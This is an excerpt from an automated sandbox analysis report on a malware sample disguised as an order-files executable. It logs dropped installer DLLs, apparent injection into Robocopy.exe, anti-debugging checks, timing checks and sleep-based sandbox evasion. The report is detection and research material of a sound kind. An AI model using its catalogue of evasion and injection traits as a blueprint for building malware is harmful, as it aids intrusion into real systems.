        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_6F8A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F8A1BFF
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_6F8A30C0 push eax; ret 0_2_6F8A30EE
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D08CD push ecx; mov dword ptr [esp], ecx3_2_351D08D6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049F08CD push ecx; mov dword ptr [esp], ecx5_2_049F08D6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D174DB push eax; retf 5_2_04D174F7
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D13DB4 pushad ; ret 5_2_04D13E61
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1FECC push ebp; retf 5_2_04D1FECD
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D158D9 push D494064Eh; iretd 5_2_04D158DE
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D14870 push edi; retf 5_2_04D14871
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1C1CA push ebp; ret 5_2_04D1C1F6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D102F3 push ds; ret 5_2_04D102F6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D25262 push eax; ret 5_2_04D25264
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1BA36 push esi; ret 5_2_04D1BA45
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1C225 push ebp; ret 5_2_04D1C1F6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D163E2 push ebx; iretd 5_2_04D16409
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeAPI/Special instruction interceptor: Address: 6EB14E4
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeAPI/Special instruction interceptor: Address: 3B314E4
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF9C282D144
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF9C282D604
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF9C282D764
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF9C282D324
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF9C282D364
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF9C282D004
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF9C282FF74
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF9C282D864
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35211763 rdtsc 3_2_35211763
        Source: C:\Windows\SysWOW64\Robocopy.exeWindow / User API: threadDelayed 9646Jump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI coverage: 1.9 %
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7956Thread sleep count: 326 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7956Thread sleep time: -652000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7956Thread sleep count: 9646 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7956Thread sleep time: -19292000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936Thread sleep count: 46 > 30Jump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936Thread sleep time: -69000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936Thread sleep count: 60 > 30Jump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C60
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeAPI call chain: ExitProcess graph end nodegraph_0-2685
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeAPI call chain: ExitProcess graph end nodegraph_0-2910
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35211763 rdtsc 3_2_35211763
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_00406044 GetFileAttributesW,LdrInitializeThunk,LdrInitializeThunk,CreateFileW,0_2_00406044
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_6F8A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F8A1BFF
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35201527 mov eax, dword ptr fs:[00000030h]3_2_35201527
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]3_2_351F1514
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]3_2_351F1514
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]3_2_351F1514
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]3_2_351F1514
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]3_2_351F1514
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]3_2_351F1514
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35212539 mov eax, dword ptr fs:[00000030h]3_2_35212539
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]3_2_351FE507
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]3_2_351FE507
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]3_2_351FE507
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]3_2_351FE507
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]3_2_351FE507
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]3_2_351FE507
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]3_2_351FE507
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]3_2_351FE507
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D2500 mov eax, dword ptr fs:[00000030h]3_2_351D2500
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CB502 mov eax, dword ptr fs:[00000030h]3_2_351CB502
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C753F mov eax, dword ptr fs:[00000030h]3_2_351C753F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C753F mov eax, dword ptr fs:[00000030h]3_2_351C753F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C753F mov eax, dword ptr fs:[00000030h]3_2_351C753F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D3536 mov eax, dword ptr fs:[00000030h]3_2_351D3536
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D3536 mov eax, dword ptr fs:[00000030h]3_2_351D3536
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520C50D mov eax, dword ptr fs:[00000030h]3_2_3520C50D
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520C50D mov eax, dword ptr fs:[00000030h]3_2_3520C50D
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]3_2_351E252B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]3_2_351E252B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]3_2_351E252B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]3_2_351E252B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]3_2_351E252B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]3_2_351E252B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]3_2_351E252B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525C51D mov eax, dword ptr fs:[00000030h]3_2_3525C51D
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov ecx, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov ecx, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]3_2_3527F51B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D254C mov eax, dword ptr fs:[00000030h]3_2_351D254C
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EE547 mov eax, dword ptr fs:[00000030h]3_2_351EE547
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35206540 mov eax, dword ptr fs:[00000030h]3_2_35206540
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35208540 mov eax, dword ptr fs:[00000030h]3_2_35208540
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352AB55F mov eax, dword ptr fs:[00000030h]3_2_352AB55F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352AB55F mov eax, dword ptr fs:[00000030h]3_2_352AB55F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529A553 mov eax, dword ptr fs:[00000030h]3_2_3529A553
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EC560 mov eax, dword ptr fs:[00000030h]3_2_351EC560
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352585AA mov eax, dword ptr fs:[00000030h]3_2_352585AA
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520A580 mov eax, dword ptr fs:[00000030h]3_2_3520A580
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520A580 mov eax, dword ptr fs:[00000030h]3_2_3520A580
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528F582 mov eax, dword ptr fs:[00000030h]3_2_3528F582
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3524E588 mov eax, dword ptr fs:[00000030h]3_2_3524E588
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3524E588 mov eax, dword ptr fs:[00000030h]3_2_3524E588
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D45B0 mov eax, dword ptr fs:[00000030h]3_2_351D45B0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D45B0 mov eax, dword ptr fs:[00000030h]3_2_351D45B0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35202594 mov eax, dword ptr fs:[00000030h]3_2_35202594
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520A5E7 mov ebx, dword ptr fs:[00000030h]3_2_3520A5E7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520A5E7 mov eax, dword ptr fs:[00000030h]3_2_3520A5E7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352015EF mov eax, dword ptr fs:[00000030h]3_2_352015EF
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525C5FC mov eax, dword ptr fs:[00000030h]3_2_3525C5FC
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]3_2_351CF5C7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352505C6 mov eax, dword ptr fs:[00000030h]3_2_352505C6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520C5C6 mov eax, dword ptr fs:[00000030h]3_2_3520C5C6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352065D0 mov eax, dword ptr fs:[00000030h]3_2_352065D0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]3_2_351DB5E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]3_2_351DB5E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]3_2_351DB5E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]3_2_351DB5E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]3_2_351DB5E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]3_2_351DB5E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35207425 mov eax, dword ptr fs:[00000030h]3_2_35207425
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35207425 mov ecx, dword ptr fs:[00000030h]3_2_35207425
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]3_2_3525F42F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]3_2_3525F42F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]3_2_3525F42F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]3_2_3525F42F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]3_2_3525F42F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35259429 mov eax, dword ptr fs:[00000030h]3_2_35259429
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C640D mov eax, dword ptr fs:[00000030h]3_2_351C640D
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528F409 mov eax, dword ptr fs:[00000030h]3_2_3528F409
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35266400 mov eax, dword ptr fs:[00000030h]3_2_35266400
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35266400 mov eax, dword ptr fs:[00000030h]3_2_35266400
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CB420 mov eax, dword ptr fs:[00000030h]3_2_351CB420
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]3_2_351FE45E
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]3_2_351FE45E
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]3_2_351FE45E
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]3_2_351FE45E
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]3_2_351FE45E
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]3_2_351DD454
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]3_2_351DD454
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]3_2_351DD454
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]3_2_351DD454
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]3_2_351DD454
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]3_2_351DD454
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529A464 mov eax, dword ptr fs:[00000030h]3_2_3529A464
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528F478 mov eax, dword ptr fs:[00000030h]3_2_3528F478
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]3_2_351E0445
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]3_2_351E0445
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]3_2_351E0445
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]3_2_351E0445
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]3_2_351E0445
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]3_2_351E0445
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D8470 mov eax, dword ptr fs:[00000030h]3_2_351D8470
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D8470 mov eax, dword ptr fs:[00000030h]3_2_351D8470
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520D450 mov eax, dword ptr fs:[00000030h]3_2_3520D450
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520D450 mov eax, dword ptr fs:[00000030h]3_2_3520D450
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525D4A0 mov ecx, dword ptr fs:[00000030h]3_2_3525D4A0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525D4A0 mov eax, dword ptr fs:[00000030h]3_2_3525D4A0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525D4A0 mov eax, dword ptr fs:[00000030h]3_2_3525D4A0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352044A8 mov eax, dword ptr fs:[00000030h]3_2_352044A8
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D0485 mov ecx, dword ptr fs:[00000030h]3_2_351D0485
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E4BC mov eax, dword ptr fs:[00000030h]3_2_3520E4BC
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520648A mov eax, dword ptr fs:[00000030h]3_2_3520648A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520648A mov eax, dword ptr fs:[00000030h]3_2_3520648A
